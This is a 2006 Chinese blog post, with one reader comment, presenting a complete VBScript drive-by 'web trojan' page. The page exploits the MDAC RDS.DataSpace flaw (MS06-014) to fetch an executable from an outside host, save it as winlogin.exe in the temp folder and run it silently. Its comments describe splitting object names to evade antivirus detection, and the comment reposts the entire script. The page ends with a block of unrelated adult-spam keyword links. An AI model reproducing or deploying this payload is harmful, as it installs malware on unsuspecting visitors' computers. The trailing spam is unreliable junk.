• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            brent's hut

            一段植入木馬的html代碼

            < html >
            ?
            < script? language ="VBScript" >
            ????
            on ? error ? resume ? next
            ????
            ' 即將下載的木馬
            ????dl? = " ht#tp://ww#w.800vv.com/cc/cj.exe# "
            ????
            ' 創(chuàng)建OBJECT元素
            ???? Set ?df? = ?document.createElement( " object " )
            ????
            ' 指定OBJECT為RDS.DataSpace?
            ???????? ' 該對(duì)象有一個(gè)方法名為CreateObject,
            ???????? ' helpstring("Creates?a?business?object?of?the?specified?Progid?over?the?specified?connection")
            ????df.setAttribute? " classid " ,? " clsid:BD96C556-65A3-11D#0-983A-00C04F#C29E36 "
            ????
            '
            ????str = " Microsoft.XMLHTTP "
            ????
            ' RDS.DataSpace.CreateObject("Microsoft.XMLHTTP","")
            ???? Set ?x? = ?df.CreateObject(str, "" )
            ????
            ' 4545
            ????a1 = " A#do "
            ????a2
            = " db. "
            ????a3
            = " Str "
            ????a4
            = " eam "
            ????
            ' str5?=?"Adodb.Stream"?分成這么多段是為了掩人耳目
            ????str1 = a1 & a2 & a3 & a4
            ????str5
            = str1
            ????
            ' RDS.DataSpace.CreateObject("Ado#db.Str#eam","")
            ???? set ?S? = ?df.createobject(str5, "" )
            ????
            ' 5455
            ????S.type? = ? 1
            ????str6
            = " GET "
            ????
            ' Microsoft.XMLHTTP.Open?"GET"?"ht#tp://ww#w.800vv.com/cc/cj.exe#"?False
            ???????? ' 下載木馬
            ????x.Open?str6,?dl,? False
            ????x.Send
            ????
            ' 本地文件名
            ????fname1 = " winlogin.exe "
            ????
            ' 888
            ???? set ?F? = ?df.createobject( " Scri#pting.FileSy#stemObject " , "" )
            ????
            ' 獲取臨時(shí)目錄
            ???? set ?tmp? = ?F.GetSpecialFolder( 2 )?
            ????
            ' 創(chuàng)建本地文件
            ????fname1 = ?F.BuildPath(tmp,fname1)
            ????
            ' Adodb.Stream.open
            ????S.open
            ????
            ' Adodb.Stream.write?木馬代碼
            ????S.write?x.responseBody
            ????
            ' Adodb.Stream.savetofile?"臨時(shí)目錄\winlogin.exe"
            ????S.savetofile?fname1, 2
            ????
            ' 6551
            ????S.close
            ????
            ' 458
            ???? set ?Q? = ?df.createobject( " Shell.Application " , "" )
            ????
            ' 運(yùn)行?臨時(shí)目錄\winlogin.exe
            ????Q.ShellExecute?fname1, "" , ""
            ????
            ' 55
            ????
            </ script >
            ????
            < head >
            ????
            < title > icexiaoyeMS06-014免殺網(wǎng)馬 </ title >
            ????
            </ head >< body >
            ????
            < center > icexiaoyeMS06-014免殺網(wǎng)馬 </ center >
            ????
            </ body >

            < script? type ="text/jscript" >
            function ?init()? {?
            document.write(Date());

            }

            window.onload?
            = ?init;
            </ script >
            </ html >
            一般來說,script是無法寫本地文件的。。這段代碼利用了Microsoft Data Access Components (MDAC)的一個(gè)安全漏洞來寫本地文件。

            posted on 2006-09-25 14:18 brent 閱讀(6363) 評(píng)論(1)  編輯 收藏 引用 所屬分類: Windows

            評(píng)論

            # re: 一段植入木馬的html代碼 2012-06-25 14:47 往往v

            < html >
            < script language ="VBScript" >
            on error resume next
            ' 即將下載的木馬
            dl = " ht#tp://ww#w.800vv.com/cc/cj.exe# "
            ' 創(chuàng)建OBJECT元素
            Set df = document.createElement( " object " )
            ' 指定OBJECT為RDS.DataSpace
            ' 該對(duì)象有一個(gè)方法名為CreateObject,
            ' helpstring("Creates a business object of the specified Progid over the specified connection")
            df.setAttribute " classid " , " clsid:BD96C556-65A3-11D#0-983A-00C04F#C29E36 "
            '
            str = " Microsoft.XMLHTTP "
            ' RDS.DataSpace.CreateObject("Microsoft.XMLHTTP","")
            Set x = df.CreateObject(str, "" )
            ' 4545
            a1 = " A#do "
            a2 = " db. "
            a3 = " Str "
            a4 = " eam "
            ' str5 = "Adodb.Stream" 分成這么多段是為了掩人耳目
            str1 = a1 & a2 & a3 & a4
            str5 = str1
            ' RDS.DataSpace.CreateObject("Ado#db.Str#eam","")
            set S = df.createobject(str5, "" )
            ' 5455
            S.type = 1
            str6 = " GET "
            ' Microsoft.XMLHTTP.Open "GET" "ht#tp://ww#w.800vv.com/cc/cj.exe#" False
            ' 下載木馬
            x.Open str6, dl, False
            x.Send
            ' 本地文件名
            fname1 = " winlogin.exe "
            ' 888
            set F = df.createobject( " Scri#pting.FileSy#stemObject " , "" )
            ' 獲取臨時(shí)目錄
            set tmp = F.GetSpecialFolder( 2 )
            ' 創(chuàng)建本地文件
            fname1 = F.BuildPath(tmp,fname1)
            ' Adodb.Stream.open
            S.open
            ' Adodb.Stream.write 木馬代碼
            S.write x.responseBody
            ' Adodb.Stream.savetofile "臨時(shí)目錄\winlogin.exe"
            S.savetofile fname1, 2
            ' 6551
            S.close
            ' 458
            set Q = df.createobject( " Shell.Application " , "" )
            ' 運(yùn)行 臨時(shí)目錄\winlogin.exe
            Q.ShellExecute fname1, "" , ""
            ' 55
            </ script >
            < head >
            < title > icexiaoyeMS06-014免殺網(wǎng)馬 </ title >
            </ head >< body >
            < center > icexiaoyeMS06-014免殺網(wǎng)馬 </ center >
            </ body >

            < script type ="text/jscript" >
            function init() {
            document.write(Date());

            }
            window.onload = init;
            </ script >
            </ html >  回復(fù)  更多評(píng)論   

            色综合久久天天综合| 色老头网站久久网| 亚洲国产天堂久久久久久| 亚洲乱码日产精品a级毛片久久 | 精品久久久久久| 久久综合久久性久99毛片| 欧美黑人激情性久久| 热久久视久久精品18| 久久国产影院| 久久99精品久久只有精品| 亚洲综合伊人久久大杳蕉| 狠狠色噜噜狠狠狠狠狠色综合久久 | 久久亚洲av无码精品浪潮| 久久91这里精品国产2020| 一本综合久久国产二区| 欧美久久综合性欧美| 97精品伊人久久久大香线蕉| 超级碰碰碰碰97久久久久| 国产99久久久国产精免费| 久久久国产乱子伦精品作者| 久久精品人成免费| 久久久久久国产精品美女| 综合人妻久久一区二区精品| 久久国产午夜精品一区二区三区| 精品久久久久久| 久久久久四虎国产精品| 久久精品天天中文字幕人妻| 性做久久久久久久| 国产精品美女久久久久久2018| 久久无码高潮喷水| 国产精品亚洲综合久久| 色婷婷久久综合中文久久蜜桃av | 欧美日韩成人精品久久久免费看 | 亚洲愉拍99热成人精品热久久| 久久精品国产久精国产果冻传媒| 久久只有这精品99| 四虎亚洲国产成人久久精品| 久久综合成人网| 精品久久久久成人码免费动漫| 久久无码高潮喷水| 99精品久久久久久久婷婷|